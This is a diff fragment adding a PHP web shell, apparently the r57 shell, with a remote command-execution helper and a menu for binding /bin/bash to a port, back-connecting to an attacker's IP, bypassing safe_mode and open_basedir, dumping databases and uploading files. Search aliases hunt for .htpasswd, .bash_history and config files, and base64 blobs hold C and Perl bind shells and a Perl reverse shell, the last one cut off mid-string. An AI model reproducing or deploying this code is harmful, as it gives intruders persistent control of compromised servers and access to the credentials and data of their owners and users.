+  $r .= '<tr><td>'.ws(3).'<font face=Verdana size=-2><b>'.$key.'</b></font></td><td><font face=Verdana size=-2><div align=center><b>'.U_value($value['local_value']).'</b></div></font></td><td><font face=Verdana size=-2><div align=center><b>'.U_value($value['global_value']).'</b></div></font></td></tr>';
+  }
+ echo $r;
+ echo '</table>';
+ }
+echo "<br><div align=center><font face=Verdana size=-2><b>[ <a href=".$_SERVER['PHP_SELF'].">BACK</a> ]</b></font></div>";
+die();
+}
+if(isset($_GET['cpu']))
+ {
+   echo $head;
+   echo '<table width=100%><tr><td bgcolor=#cccccc><div align=center><font face=Verdana size=-2 color=red><b>CPU</b></font></div></td></tr></table><table width=100%>';
+   $cpuf = @file("cpuinfo");
+   if($cpuf)
+    {
+      $c = @sizeof($cpuf);
+      for($i=0;$i<$c;$i++)
+        {
+          $info = @explode(":",$cpuf[$i]);
+          if($info[1]==""){ $info[1]="---"; }
+          $r .= '<tr><td>'.ws(3).'<font face=Verdana size=-2><b>'.trim($info[0]).'</b></font></td><td><font face=Verdana size=-2><div align=center><b>'.trim($info[1]).'</b></div></font></td></tr>';
+        }
+      echo $r;
+    }
+   else
+    {
+      echo '<tr><td>'.ws(3).'<div align=center><font face=Verdana size=-2><b> --- </b></font></div></td></tr>';
+    }
+   echo '</table>';
+   echo "<br><div align=center><font face=Verdana size=-2><b>[ <a href=".$_SERVER['PHP_SELF'].">BACK</a> ]</b></font></div>";
+   die();
+ }
+if(isset($_GET['mem']))
+ {
+   echo $head;
+   echo '<table width=100%><tr><td bgcolor=#cccccc><div align=center><font face=Verdana size=-2 color=red><b>MEMORY</b></font></div></td></tr></table><table width=100%>';
+   $memf = @file("meminfo");
+   if($memf)
+    {
+      $c = sizeof($memf);
+      for($i=0;$i<$c;$i++)
+        {
+          $info = explode(":",$memf[$i]);
+          if($info[1]==""){ $info[1]="---"; }
+          $r .= '<tr><td>'.ws(3).'<font face=Verdana size=-2><b>'.trim($info[0]).'</b></font></td><td><font face=Verdana size=-2><div align=center><b>'.trim($info[1]).'</b></div></font></td></tr>';
+        }
+      echo $r;
+    }
+   else
+    {
+      echo '<tr><td>'.ws(3).'<div align=center><font face=Verdana size=-2><b> --- </b></font></div></td></tr>';
+    }
+   echo '</table>';
+   echo "<br><div align=center><font face=Verdana size=-2><b>[ <a href=".$_SERVER['PHP_SELF'].">BACK</a> ]</b></font></div>";
+   die();
+ }
+/*
+????? ?????
+$language='eng' - ???????
+$language='ru' - ??????????
+*/
+$language='eng';
+$lang=array(
+'ru_text1' =>'??????????? ???????',
+'ru_text2' =>'?????????? ?????? ?? ???????',
+'ru_text3' =>'????????? ???????',
+'ru_text4' =>'??????? ??????????',
+'ru_text5' =>'???????? ?????? ?? ??????',
+'ru_text6' =>'????????? ????',
+'ru_text7' =>'??????',
+'ru_text8' =>'???????? ?????',
+'ru_butt1' =>'?????????',
+'ru_butt2' =>'?????????',
+'ru_text9' =>'???????? ????? ? ???????? ??? ? /bin/bash',
+'ru_text10'=>'??????? ????',
+'ru_text11'=>'?????? ??? ???????',
+'ru_butt3' =>'???????',
+'ru_text12'=>'back-connect',
+'ru_text13'=>'IP-?????',
+'ru_text14'=>'????',
+'ru_butt4' =>'?????????',
+'ru_text15'=>'???????? ?????? ? ?????????? ???????',
+'ru_text16'=>'????????????',
+'ru_text17'=>'????????? ????',
+'ru_text18'=>'????????? ????',
+'ru_text19'=>'Exploits',
+'ru_text20'=>'????????????',
+'ru_text21'=>'????? ???',
+'ru_text22'=>'datapipe',
+'ru_text23'=>'????????? ????',
+'ru_text24'=>'????????? ????',
+'ru_text25'=>'????????? ????',
+'ru_text26'=>'????????????',
+'ru_butt5' =>'?????????',
+'ru_text28'=>'?????? ? safe_mode',
+'ru_text29'=>'?????? ????????',
+'ru_butt6' =>'???????',
+'ru_text30'=>'???????? ?????',
+'ru_butt7' =>'???????',
+'ru_text31'=>'???? ?? ??????',
+'ru_text32'=>'?????????? PHP ????',
+'ru_text33'=>'???????? ??????????? ?????? ??????????? open_basedir ????? ??????? cURL',
+'ru_butt8' =>'?????????',
+'ru_text34'=>'???????? ??????????? ?????? ??????????? safe_mode ????? ??????? include',
+'ru_text35'=>'???????? ??????????? ?????? ??????????? safe_mode ????? ???????? ????? ? mysql',
+'ru_text36'=>'????',
+'ru_text37'=>'?????',
+'ru_text38'=>'??????',
+'ru_text39'=>'???????',
+'ru_text40'=>'???? ??????? ???? ??????',
+'ru_butt9' =>'????',
+'ru_text41'=>'????????? ? ?????',
+'ru_text42'=>'?????????????? ?????',
+'ru_text43'=>'????????????? ????',
+'ru_butt10'=>'?????????',
+'ru_butt11'=>'?????????????',
+'ru_text44'=>'?????????????? ????? ??????????! ?????? ?????? ??? ??????!',
+'ru_text45'=>'???? ????????',
+'ru_text46'=>'???????? phpinfo()',
+'ru_text47'=>'???????? ???????? php.ini',
+'ru_text48'=>'???????? ????????? ??????',
+'ru_text49'=>'???????? ??????? ? ???????',
+'ru_text50'=>'?????????? ? ??????????',
+'ru_text51'=>'?????????? ? ??????',
+'ru_text52'=>'????? ??? ??????',
+'ru_text53'=>'?????? ? ?????',
+'ru_text54'=>'????? ?????? ? ??????',
+'ru_butt12'=>'?????',
+'ru_text55'=>'?????? ? ??????',
+'ru_text56'=>'?????? ?? ???????',
+'ru_text57'=>'???????/??????? ????/??????????',
+'ru_text58'=>'???',
+'ru_text59'=>'????',
+'ru_text60'=>'??????????',
+'ru_butt13'=>'???????/???????',
+'ru_text61'=>'???? ??????',
+'ru_text62'=>'?????????? ???????',
+'ru_text63'=>'???? ??????',
+'ru_text64'=>'?????????? ???????',
+'ru_text65'=>'???????',
+'ru_text66'=>'???????',
+'ru_text67'=>'Chown/Chgrp/Chmod',
+'ru_text68'=>'???????',
+'ru_text69'=>'????????1',
+'ru_text70'=>'????????2',
+'ru_text71'=>"?????? ???????? ???????:\r\n- ??? CHOWN - ??? ?????? ???????????? ??? ??? UID (??????) \r\n- ??? ??????? CHGRP - ??? ?????? ??? GID (??????) \r\n- ??? ??????? CHMOD - ????? ????? ? ???????????? ????????????? (???????? 0777)",
+'ru_text72'=>'????? ??? ??????',
+'ru_text73'=>'?????? ? ?????',
+'ru_text74'=>'?????? ? ??????',
+'ru_text75'=>'* ????? ???????????? ?????????? ?????????',
+'ru_text76'=>'????? ?????? ? ?????? ? ??????? ??????? find',
+'ru_text77'=>'???????? ????????? ???? ??????',
+'ru_text78'=>'?????????? ???????',
+'ru_text79'=>'?????????? ???????',
+'ru_text80'=>'???',
+'ru_text81'=>'????',
+'ru_text82'=>'???? ??????',
+'ru_text83'=>'?????????? SQL ???????',
+'ru_text84'=>'SQL ??????',
+'ru_text85'=>'???????? ??????????? ?????? ??????????? safe_mode ????? ?????????? ?????? ? MSSQL ???????',
+/* --------------------------------------------------------------- */
+'eng_text1' =>'Executed command',
+'eng_text2' =>'Execute command on server',
+'eng_text3' =>'Run command',
+'eng_text4' =>'Work directory',
+'eng_text5' =>'Upload files on server',
+'eng_text6' =>'Local file',
+'eng_text7' =>'Aliases',
+'eng_text8' =>'Select alias',
+'eng_butt1' =>'Execute',
+'eng_butt2' =>'Upload',
+'eng_text9' =>'Bind port to /bin/bash',
+'eng_text10'=>'Port',
+'eng_text11'=>'Password for access',
+'eng_butt3' =>'Bind',
+'eng_text12'=>'back-connect',
+'eng_text13'=>'IP',
+'eng_text14'=>'Port',
+'eng_butt4' =>'Connect',
+'eng_text15'=>'Upload files from remote server',
+'eng_text16'=>'With',
+'eng_text17'=>'Remote file',
+'eng_text18'=>'Local file',
+'eng_text19'=>'Exploits',
+'eng_text20'=>'Use',
+'eng_text21'=>'&nbsp;New name',
+'eng_text22'=>'datapipe',
+'eng_text23'=>'Local port',
+'eng_text24'=>'Remote host',
+'eng_text25'=>'Remote port',
+'eng_text26'=>'Use',
+'eng_butt5' =>'Run',
+'eng_text28'=>'Work in safe_mode',
+'eng_text29'=>'ACCESS DENIED',
+'eng_butt6' =>'Change',
+'eng_text30'=>'Cat file',
+'eng_butt7' =>'Show',
+'eng_text31'=>'File not found',
+'eng_text32'=>'Eval PHP code',
+'eng_text33'=>'Test bypass open_basedir with cURL functions',
+'eng_butt8' =>'Test',
+'eng_text34'=>'Test bypass safe_mode with include function',
+'eng_text35'=>'Test bypass safe_mode with load file in mysql',
+'eng_text36'=>'Database',
+'eng_text37'=>'Login',
+'eng_text38'=>'Password',
+'eng_text39'=>'Table',
+'eng_text40'=>'Dump database table',
+'eng_butt9' =>'Dump',
+'eng_text41'=>'Save dump in file',
+'eng_text42'=>'Edit files',
+'eng_text43'=>'File for edit',
+'eng_butt10'=>'Save',
+'eng_text44'=>'Can\'t edit file! Only read access!',
+'eng_text45'=>'File saved',
+'eng_text46'=>'Show phpinfo()',
+'eng_text47'=>'Show variables from php.ini',
+'eng_text48'=>'Delete temp files',
+'eng_butt11'=>'Edit file',
+'eng_text49'=>'Delete script from server',
+'eng_text50'=>'View cpu info',
+'eng_text51'=>'View memory info',
+'eng_text52'=>'Find text',
+'eng_text53'=>'In dirs',
+'eng_text54'=>'Find text in files',
+'eng_butt12'=>'Find',
+'eng_text55'=>'Only in files',
+'eng_text56'=>'Nothing :(',
+'eng_text57'=>'Create/Delete File/Dir',
+'eng_text58'=>'name',
+'eng_text59'=>'file',
+'eng_text60'=>'dir',
+'eng_butt13'=>'Create/Delete',
+'eng_text61'=>'File created',
+'eng_text62'=>'Dir created',
+'eng_text63'=>'File deleted',
+'eng_text64'=>'Dir deleted',
+'eng_text65'=>'Create',
+'eng_text66'=>'Delete',
+'eng_text67'=>'Chown/Chgrp/Chmod',
+'eng_text68'=>'Command',
+'eng_text69'=>'param1',
+'eng_text70'=>'param2',
+'eng_text71'=>"Second commands param is:\r\n- for CHOWN - name of new owner or UID\r\n- for CHGRP - group name or GID\r\n- for CHMOD - 0777, 0755...",
+'eng_text72'=>'Text for find',
+'eng_text73'=>'Find in folder',
+'eng_text74'=>'Find in files',
+'eng_text75'=>'* you can use regexp',
+'eng_text76'=>'Search text in files via find',
+'eng_text77'=>'Show database structure',
+'eng_text78'=>'show tables',
+'eng_text79'=>'show columns',
+'eng_text80'=>'Type',
+'eng_text81'=>'Net',
+'eng_text82'=>'Databases',
+'eng_text83'=>'Run SQL query',
+'eng_text84'=>'SQL query',
+);
+/*
+?????? ??????
+????????? ???????? ????????????? ?????? ????? ? ???-?? ??????. ( ??????? ????????? ???? ????????? ???? )
+?? ?????? ???? ????????? ??? ???????? ???????.
+*/
+$aliases=array(
+'find suid files'=>'find / -type f -perm -04000 -ls',
+'find suid files in current dir'=>'find . -type f -perm -04000 -ls',
+'find sgid files'=>'find / -type f -perm -02000 -ls',
+'find sgid files in current dir'=>'find . -type f -perm -02000 -ls',
+'find config.inc.php files'=>'find / -type f -name config.inc.php',
+'find config.inc.php files in current dir'=>'find . -type f -name config.inc.php',
+'find config* files'=>'find / -type f -name "config*"',
+'find config* files in current dir'=>'find . -type f -name "config*"',
+'find all writable files'=>'find / -type f -perm -2 -ls',
+'find all writable files in current dir'=>'find . -type f -perm -2 -ls',
+'find all writable directories'=>'find /  -type d -perm -2 -ls',
+'find all writable directories in current dir'=>'find . -type d -perm -2 -ls',
+'find all writable directories and files'=>'find / -perm -2 -ls',
+'find all writable directories and files in current dir'=>'find . -perm -2 -ls',
+'find all service.pwd files'=>'find / -type f -name service.pwd',
+'find service.pwd files in current dir'=>'find . -type f -name service.pwd',
+'find all .htpasswd files'=>'find / -type f -name .htpasswd',
+'find .htpasswd files in current dir'=>'find . -type f -name .htpasswd',
+'find all .bash_history files'=>'find / -type f -name .bash_history',
+'find .bash_history files in current dir'=>'find . -type f -name .bash_history',
+'find all .mysql_history files'=>'find / -type f -name .mysql_history',
+'find .mysql_history files in current dir'=>'find . -type f -name .mysql_history',
+'find all .fetchmailrc files'=>'find / -type f -name .fetchmailrc',
+'find .fetchmailrc files in current dir'=>'find . -type f -name .fetchmailrc',
+'list file attributes on a Linux second extended file system'=>'lsattr -va',
+'show opened ports'=>'netstat -an | grep -i listen',
+'----------------------------------------------------------------------------------------------------'=>'ls -la'
+);
+$table_up1  = "<tr><td bgcolor=#cccccc><font face=Verdana size=-2><b><div align=center>:: ";
+$table_up2  = " ::</div></b></font></td></tr><tr><td>";
+$table_up3  = "<table width=100% cellpadding=0 cellspacing=0 bgcolor=#000000><tr><td bgcolor=#cccccc>";
+$table_end1 = "</td></tr>";
+$arrow = " <font face=Wingdings color=gray>?</font>";
+$lb = "<font color=black>[</font>";
+$rb = "<font color=black>]</font>";
+$font = "<font face=Verdana size=-2>";
+$ts = "<table class=table1 width=100% align=center>";
+$te = "</table>";
+$fs = "<form name=form method=POST>";
+$fe = "</form>";
+
+if (!empty($_POST['dir'])) { @chdir($_POST['dir']); }
+$dir = @getcwd();
+$windows = 0;
+$unix = 0;
+if(strlen($dir)>1 && $dir[1]==":") $windows=1; else $unix=1;
+if(empty($dir))
+ {
+ $os = getenv('OS');
+ if(empty($os)){ $os = php_uname(); }
+ if(empty($os)){ $os ="-"; $unix=1; }
+ else
+    {
+    if(@eregi("^win",$os)) { $windows = 1; }
+    else { $unix = 1; }
+    }
+ }
+if(!empty($_POST['s_dir']) && !empty($_POST['s_text']) && !empty($_POST['cmd']) && $_POST['cmd'] == "search_text")
+  {
+    echo $head;
+    if(!empty($_POST['s_mask']) && !empty($_POST['m'])) { $sr = new SearchResult($_POST['s_dir'],$_POST['s_text'],$_POST['s_mask']); }
+    else { $sr = new SearchResult($_POST['s_dir'],$_POST['s_text']); }
+    $sr->SearchText(0,0);
+    $res = $sr->GetResultFiles();
+    $found = $sr->GetMatchesCount();
+    $titles = $sr->GetTitles();
+    $r = "";
+    if($found > 0)
+    {
+      $r .= "<TABLE width=100%>";
+      foreach($res as $file=>$v)
+      {
+        $r .= "<TR>";
+        $r .= "<TD colspan=2><font face=Verdana size=-2><b>".ws(3);
+        $r .= ($windows)? str_replace("/","\\",$file) : $file;
+        $r .= "</b></font></ TD>";
+        $r .= "</TR>";
+        foreach($v as $a=>$b)
+        {
+          $r .= "<TR>";
+          $r .= "<TD align=center><B><font face=Verdana size=-2>".$a."</font></B></TD>";
+          $r .= "<TD><font face=Verdana size=-2>".ws(2).$b."</font></TD>";
+          $r .= "</TR>\n";
+        }
+      }
+      $r .= "</TABLE>";
+    echo $r;
+    }
+    else
+    {
+      echo "<P align=center><B><font face=Verdana size=-2>".$lang[$language.'_text56']."</B></font></P>";
+    }
+  echo "<br><div align=center><font face=Verdana size=-2><b>[ <a href=".$_SERVER['PHP_SELF'].">BACK</a> ]</b></font></div>";
+  die();
+  }
+if($windows&&!$safe_mode)
+ {
+ $uname = ex("ver");
+ if(empty($uname)) { $safe_mode = 1; }
+ }
+else if($unix&&!$safe_mode)
+ {
+ $uname = ex("uname");
+ if(empty($uname)) { $safe_mode = 1; }
+ }
+$SERVER_SOFTWARE = getenv('SERVER_SOFTWARE');
+if(empty($SERVER_SOFTWARE)){ $SERVER_SOFTWARE = "-"; }
+function ws($i)
+{
+return @str_repeat("&nbsp;",$i);
+}
+function ex($cfe)
+{
+ $res = '';
+ if (!empty($cfe))
+ {
+  if(function_exists('exec'))
+   {
+    @exec($cfe,$res);
+    $res = join("\n",$res);
+   }
+  elseif(function_exists('shell_exec'))
+   {
+    $res = @shell_exec($cfe);
+   }
+  elseif(function_exists('system'))
+   {
+    @ob_start();
+    @system($cfe);
+    $res = @ob_get_contents();
+    @ob_end_clean();
+   }
+  elseif(function_exists('passthru'))
+   {
+    @ob_start();
+    @passthru($cfe);
+    $res = @ob_get_contents();
+    @ob_end_clean();
+   }
+  elseif(@is_resource($f = @popen($cfe,"r")))
+  {
+   $res = "";
+   while(!@feof($f)) { $res .= @fread($f,1024); }
+   @pclose($f);
+  }
+ }
+ return $res;
+}
+function we($i)
+{
+if($GLOBALS['language']=="ru"){ $text = '??????! ?? ???? ???????? ? ???? '; }
+else { $text = "[-] ERROR! Can't write in file "; }
+echo "<table width=100% cellpadding=0 cellspacing=0><tr><td bgcolor=#cccccc><font color=red face=Verdana size=-2><div align=center><b>".$text.$i."</b></div></font></td></tr></table>";
+return null;
+}
+function re($i)
+{
+if($GLOBALS['language']=="ru"){ $text = '??????! ?? ???? ????????? ???? '; }
+else { $text = "[-] ERROR! Can't read file "; }
+echo "<table width=100% cellpadding=0 cellspacing=0 bgcolor=#000000><tr><td bgcolor=#cccccc><font color=red face=Verdana size=-2><div align=center><b>".$text.$i."</b></div></font></td></tr></table>";
+return null;
+}
+function ce($i)
+{
+if($GLOBALS['language']=="ru"){ $text = "?? ??????? ??????? "; }
+else { $text = "Can't create "; }
+echo "<table width=100% cellpadding=0 cellspacing=0 bgcolor=#000000><tr><td bgcolor=#cccccc><font color=red face=Verdana size=-2><div align=center><b>".$text.$i."</b></div></font></td></tr></table>";
+return null;
+}
+function perms($mode)
+{
+if ($GLOBALS['windows']) return 0;
+if( $mode & 0x1000 ) { $type='p'; }
+else if( $mode & 0x2000 ) { $type='c'; }
+else if( $mode & 0x4000 ) { $type='d'; }
+else if( $mode & 0x6000 ) { $type='b'; }
+else if( $mode & 0x8000 ) { $type='-'; }
+else if( $mode & 0xA000 ) { $type='l'; }
+else if( $mode & 0xC000 ) { $type='s'; }
+else $type='u';
+$owner["read"] = ($mode & 00400) ? 'r' : '-';
+$owner["write"] = ($mode & 00200) ? 'w' : '-';
+$owner["execute"] = ($mode & 00100) ? 'x' : '-';
+$group["read"] = ($mode & 00040) ? 'r' : '-';
+$group["write"] = ($mode & 00020) ? 'w' : '-';
+$group["execute"] = ($mode & 00010) ? 'x' : '-';
+$world["read"] = ($mode & 00004) ? 'r' : '-';
+$world["write"] = ($mode & 00002) ? 'w' : '-';
+$world["execute"] = ($mode & 00001) ? 'x' : '-';
+if( $mode & 0x800 ) $owner["execute"] = ($owner['execute']=='x') ? 's' : 'S';
+if( $mode & 0x400 ) $group["execute"] = ($group['execute']=='x') ? 's' : 'S';
+if( $mode & 0x200 ) $world["execute"] = ($world['execute']=='x') ? 't' : 'T';
+$s=sprintf("%1s", $type);
+$s.=sprintf("%1s%1s%1s", $owner['read'], $owner['write'], $owner['execute']);
+$s.=sprintf("%1s%1s%1s", $group['read'], $group['write'], $group['execute']);
+$s.=sprintf("%1s%1s%1s", $world['read'], $world['write'], $world['execute']);
+return trim($s);
+}
+function in($type,$name,$size,$value)
+{
+ $ret = "<input type=".$type." name=".$name." ";
+ if($size != 0) { $ret .= "size=".$size." "; }
+ $ret .= "value=\"".$value."\">";
+ return $ret;
+}
+function which($pr)
+{
+$path = ex("which $pr");
+if(!empty($path)) { return $path; } else { return $pr; }
+}
+function cf($fname,$text)
+{
+ $w_file=@fopen($fname,"w") or we($fname);
+ if($w_file)
+ {
+ @fputs($w_file,@base64_decode($text));
+ @fclose($w_file);
+ }
+}
+function sr($l,$t1,$t2)
+ {
+ return "<tr class=tr1><td class=td1 width=".$l."% align=right>".$t1."</td><td class=td1 align=left>".$t2."</td></tr>";
+ }
+if (!@function_exists("view_size"))
+{
+function view_size($size)
+{
+ if($size >= 1073741824) {$size = @round($size / 1073741824 * 100) / 100 . " GB";}
+ elseif($size >= 1048576) {$size = @round($size / 1048576 * 100) / 100 . " MB";}
+ elseif($size >= 1024) {$size = @round($size / 1024 * 100) / 100 . " KB";}
+ else {$size = $size . " B";}
+ return $size;
+}
+}
+function DirFiles($dir,$types='')
+  {
+    $files = Array();
+    if(($handle = @opendir($dir)))
+    {
+      while (FALSE !== ($file = @readdir($handle)))
+      {
+        if ($file != "." && $file != "..")
+        {
+          if(!is_dir($dir."/".$file))
+          {
+            if($types)
+            {
+              $pos = @strrpos($file,".");
+              $ext = @substr($file,$pos,@strlen($file)-$pos);
+              if(@in_array($ext,@explode(';',$types)))
+                $files[] = $dir."/".$file;
+            }
+            else
+              $files[] = $dir."/".$file;
+          }
+        }
+      }
+      @closedir($handle);
+    }
+    return $files;
+  }
+  function DirFilesWide($dir)
+  {
+    $files = Array();
+    $dirs = Array();
+    if(($handle = @opendir($dir)))
+    {
+      while (false !== ($file = @readdir($handle)))
+      {
+        if ($file != "." && $file != "..")
+        {
+          if(@is_dir($dir."/".$file))
+          {
+            $file = @strtoupper($file);
+            $dirs[$file] = '&lt;DIR&gt;';
+          }
+          else
+            $files[$file] = @filesize($dir."/".$file);
+        }
+      }
+      @closedir($handle);
+      @ksort($dirs);
+      @ksort($files);
+      $files = @array_merge($dirs,$files);
+    }
+    return $files;
+  }
+  function DirFilesR($dir,$types='')
+  {
+    $files = Array();
+    if(($handle = @opendir($dir)))
+    {
+      while (false !== ($file = @readdir($handle)))
+      {
+        if ($file != "." && $file != "..")
+        {
+          if(@is_dir($dir."/".$file))
+            $files = @array_merge($files,DirFilesR($dir."/".$file,$types));
+          else
+          {
+            $pos = @strrpos($file,".");
+            $ext = @substr($file,$pos,@strlen($file)-$pos);
+            if($types)
+            {
+              if(@in_array($ext,explode(';',$types)))
+                $files[] = $dir."/".$file;
+            }
+            else
+              $files[] = $dir."/".$file;
+          }
+        }
+      }
+      @closedir($handle);
+    }
+    return $files;
+  }
+  function DirPrintHTMLHeaders($dir)
+  {
+    $pockets = '';
+  	$handle = @opendir($dir) or die("Can't open directory $dir");
+    echo "    <ul style='margin-left: 0px; padding-left: 20px;'>\n";
+    while (false !== ($file = @readdir($handle)))
+    {
+      if ($file != "." && $file != "..")
+      {
+        if(@is_dir($dir."/".$file))
+        {
+          echo "      <li><b>[ $file ]</b></li>\n";
+          DirPrintHTMLHeaders($dir."/".$file);
+        }
+        else
+        {
+          $pos = @strrpos($file,".");
+          $ext = @substr($file,$pos,@strlen($file)-$pos);
+          if(@in_array($ext,array('.htm','.html')))
+          {
+            $header = '-=None=-';
+            $strings = @file($dir."/".$file) or die("Can't open file ".$dir."/".$file);
+            for($a=0;$a<count($strings);$a++)
+            {
+              $pattern = '(<title>(.+)</title>)';
+              if(@eregi($pattern,$strings[$a],$pockets))
+              {
+                $header = "&laquo;".$pockets[2]."&raquo;";
+                break;
+              }
+            }
+            echo "      <li>".$header."</li>\n";
+          }
+        }
+      }
+    }
+    echo "    </ul>\n";
+    @closedir($handle);
+  }
+
+  class SearchResult
+  {
+    var $text;
+    var $FilesToSearch;
+    var $ResultFiles;
+    var $FilesTotal;
+    var $MatchesCount;
+    var $FileMatschesCount;
+    var $TimeStart;
+    var $TimeTotal;
+    var $titles;
+    function SearchResult($dir,$text,$filter='')
+    {
+      $dirs = @explode(";",$dir);
+      $this->FilesToSearch = Array();
+      for($a=0;$a<count($dirs);$a++)
+        $this->FilesToSearch = @array_merge($this->FilesToSearch,DirFilesR($dirs[$a],$filter));
+      $this->text = $text;
+      $this->FilesTotal = @count($this->FilesToSearch);
+      $this->TimeStart = getmicrotime();
+      $this->MatchesCount = 0;
+      $this->ResultFiles = Array();
+      $this->FileMatchesCount = Array();
+      $this->titles = Array();
+    }
+    function GetFilesTotal() { return $this->FilesTotal; }
+    function GetTitles() { return $this->titles; }
+    function GetTimeTotal() { return $this->TimeTotal; }
+    function GetMatchesCount() { return $this->MatchesCount; }
+    function GetFileMatchesCount() { return $this->FileMatchesCount; }
+    function GetResultFiles() { return $this->ResultFiles; }
+    function SearchText($phrase=0,$case=0) {
+    $qq = @explode(' ',$this->text);
+    $delim = '|';
+      if($phrase)
+        foreach($qq as $k=>$v)
+          $qq[$k] = '\b'.$v.'\b';
+      $words = '('.@implode($delim,$qq).')';
+      $pattern = "/".$words."/";
+      if(!$case)
+        $pattern .= 'i';
+      foreach($this->FilesToSearch as $k=>$filename)
+      {
+        $this->FileMatchesCount[$filename] = 0;
+        $FileStrings = @file($filename) or @next;
+        for($a=0;$a<@count($FileStrings);$a++)
+        {
+          $count = 0;
+          $CurString = $FileStrings[$a];
+          $CurString = @Trim($CurString);
+          $CurString = @strip_tags($CurString);
+          $aa = '';
+          if(($count = @preg_match_all($pattern,$CurString,$aa)))
+          {
+            $CurString = @preg_replace($pattern,"<SPAN style='color: #990000;'><b>\\1</b></SPAN>",$CurString);
+            $this->ResultFiles[$filename][$a+1] = $CurString;
+            $this->MatchesCount += $count;
+            $this->FileMatchesCount[$filename] += $count;
+          }
+        }
+      }
+      $this->TimeTotal = @round(getmicrotime() - $this->TimeStart,4);
+    }
+  }
+  function getmicrotime()
+  {
+    list($usec,$sec) = @explode(" ",@microtime());
+    return ((float)$usec + (float)$sec);
+  }
+$port_bind_bd_c="I2luY2x1ZGUgPHN0ZGlvLmg+DQojaW5jbHVkZSA8c3RyaW5nLmg+DQojaW5jbHVkZSA8c3lzL3R5cGVzLmg+DQojaW5jbHVkZS
+A8c3lzL3NvY2tldC5oPg0KI2luY2x1ZGUgPG5ldGluZXQvaW4uaD4NCiNpbmNsdWRlIDxlcnJuby5oPg0KaW50IG1haW4oYXJnYyxhcmd2KQ0KaW50I
+GFyZ2M7DQpjaGFyICoqYXJndjsNCnsgIA0KIGludCBzb2NrZmQsIG5ld2ZkOw0KIGNoYXIgYnVmWzMwXTsNCiBzdHJ1Y3Qgc29ja2FkZHJfaW4gcmVt
+b3RlOw0KIGlmKGZvcmsoKSA9PSAwKSB7IA0KIHJlbW90ZS5zaW5fZmFtaWx5ID0gQUZfSU5FVDsNCiByZW1vdGUuc2luX3BvcnQgPSBodG9ucyhhdG9
+pKGFyZ3ZbMV0pKTsNCiByZW1vdGUuc2luX2FkZHIuc19hZGRyID0gaHRvbmwoSU5BRERSX0FOWSk7IA0KIHNvY2tmZCA9IHNvY2tldChBRl9JTkVULF
+NPQ0tfU1RSRUFNLDApOw0KIGlmKCFzb2NrZmQpIHBlcnJvcigic29ja2V0IGVycm9yIik7DQogYmluZChzb2NrZmQsIChzdHJ1Y3Qgc29ja2FkZHIgK
+ikmcmVtb3RlLCAweDEwKTsNCiBsaXN0ZW4oc29ja2ZkLCA1KTsNCiB3aGlsZSgxKQ0KICB7DQogICBuZXdmZD1hY2NlcHQoc29ja2ZkLDAsMCk7DQog
+ICBkdXAyKG5ld2ZkLDApOw0KICAgZHVwMihuZXdmZCwxKTsNCiAgIGR1cDIobmV3ZmQsMik7DQogICB3cml0ZShuZXdmZCwiUGFzc3dvcmQ6IiwxMCk
+7DQogICByZWFkKG5ld2ZkLGJ1ZixzaXplb2YoYnVmKSk7DQogICBpZiAoIWNocGFzcyhhcmd2WzJdLGJ1ZikpDQogICBzeXN0ZW0oImVjaG8gd2VsY2
+9tZSB0byByNTcgc2hlbGwgJiYgL2Jpbi9iYXNoIC1pIik7DQogICBlbHNlDQogICBmcHJpbnRmKHN0ZGVyciwiU29ycnkiKTsNCiAgIGNsb3NlKG5ld
+2ZkKTsNCiAgfQ0KIH0NCn0NCmludCBjaHBhc3MoY2hhciAqYmFzZSwgY2hhciAqZW50ZXJlZCkgew0KaW50IGk7DQpmb3IoaT0wO2k8c3RybGVuKGVu
+dGVyZWQpO2krKykgDQp7DQppZihlbnRlcmVkW2ldID09ICdcbicpDQplbnRlcmVkW2ldID0gJ1wwJzsgDQppZihlbnRlcmVkW2ldID09ICdccicpDQp
+lbnRlcmVkW2ldID0gJ1wwJzsNCn0NCmlmICghc3RyY21wKGJhc2UsZW50ZXJlZCkpDQpyZXR1cm4gMDsNCn0=";
+$port_bind_bd_pl="IyEvdXNyL2Jpbi9wZXJsDQokU0hFTEw9Ii9iaW4vYmFzaCAtaSI7DQppZiAoQEFSR1YgPCAxKSB7IGV4aXQoMSk7IH0NCiRMS
+VNURU5fUE9SVD0kQVJHVlswXTsNCnVzZSBTb2NrZXQ7DQokcHJvdG9jb2w9Z2V0cHJvdG9ieW5hbWUoJ3RjcCcpOw0Kc29ja2V0KFMsJlBGX0lORVQs
+JlNPQ0tfU1RSRUFNLCRwcm90b2NvbCkgfHwgZGllICJDYW50IGNyZWF0ZSBzb2NrZXRcbiI7DQpzZXRzb2Nrb3B0KFMsU09MX1NPQ0tFVCxTT19SRVV
+TRUFERFIsMSk7DQpiaW5kKFMsc29ja2FkZHJfaW4oJExJU1RFTl9QT1JULElOQUREUl9BTlkpKSB8fCBkaWUgIkNhbnQgb3BlbiBwb3J0XG4iOw0KbG
+lzdGVuKFMsMykgfHwgZGllICJDYW50IGxpc3RlbiBwb3J0XG4iOw0Kd2hpbGUoMSkNCnsNCmFjY2VwdChDT05OLFMpOw0KaWYoISgkcGlkPWZvcmspK
+Q0Kew0KZGllICJDYW5ub3QgZm9yayIgaWYgKCFkZWZpbmVkICRwaWQpOw0Kb3BlbiBTVERJTiwiPCZDT05OIjsNCm9wZW4gU1RET1VULCI+JkNPTk4i
+Ow0Kb3BlbiBTVERFUlIsIj4mQ09OTiI7DQpleGVjICRTSEVMTCB8fCBkaWUgcHJpbnQgQ09OTiAiQ2FudCBleGVjdXRlICRTSEVMTFxuIjsNCmNsb3N
+lIENPTk47DQpleGl0IDA7DQp9DQp9";
+$back_connect="IyEvdXNyL2Jpbi9wZXJsDQp1c2UgU29ja2V0Ow0KJGNtZD0gImx5bngiOw0KJHN5c3RlbT0gJ2VjaG8gImB1bmFtZSAtYWAiO2Vj
+aG8gImBpZGAiOy9iaW4vc2gnOw0KJDA9JGNtZDsNCiR0YXJnZXQ9JEFSR1ZbMF07DQokcG9ydD0kQVJHVlsxXTsNCiRpYWRkcj1pbmV0X2F0b24oJHR
+hcmdldCkgfHwgZGllKCJFcnJvcjogJCFcbiIpOw0KJHBhZGRyPXNvY2thZGRyX2luKCRwb3J0LCAkaWFkZHIpIHx8IGRpZSgiRXJyb3I6ICQhXG4iKT
+sNCiRwcm90bz1nZXRwcm90b2J5bmFtZSgndGNwJyk7DQpzb2NrZXQoU09DS0VULCBQRl9JTkVULCBTT0NLX1NUUkVBTSwgJHByb3RvKSB8fCBkaWUoI
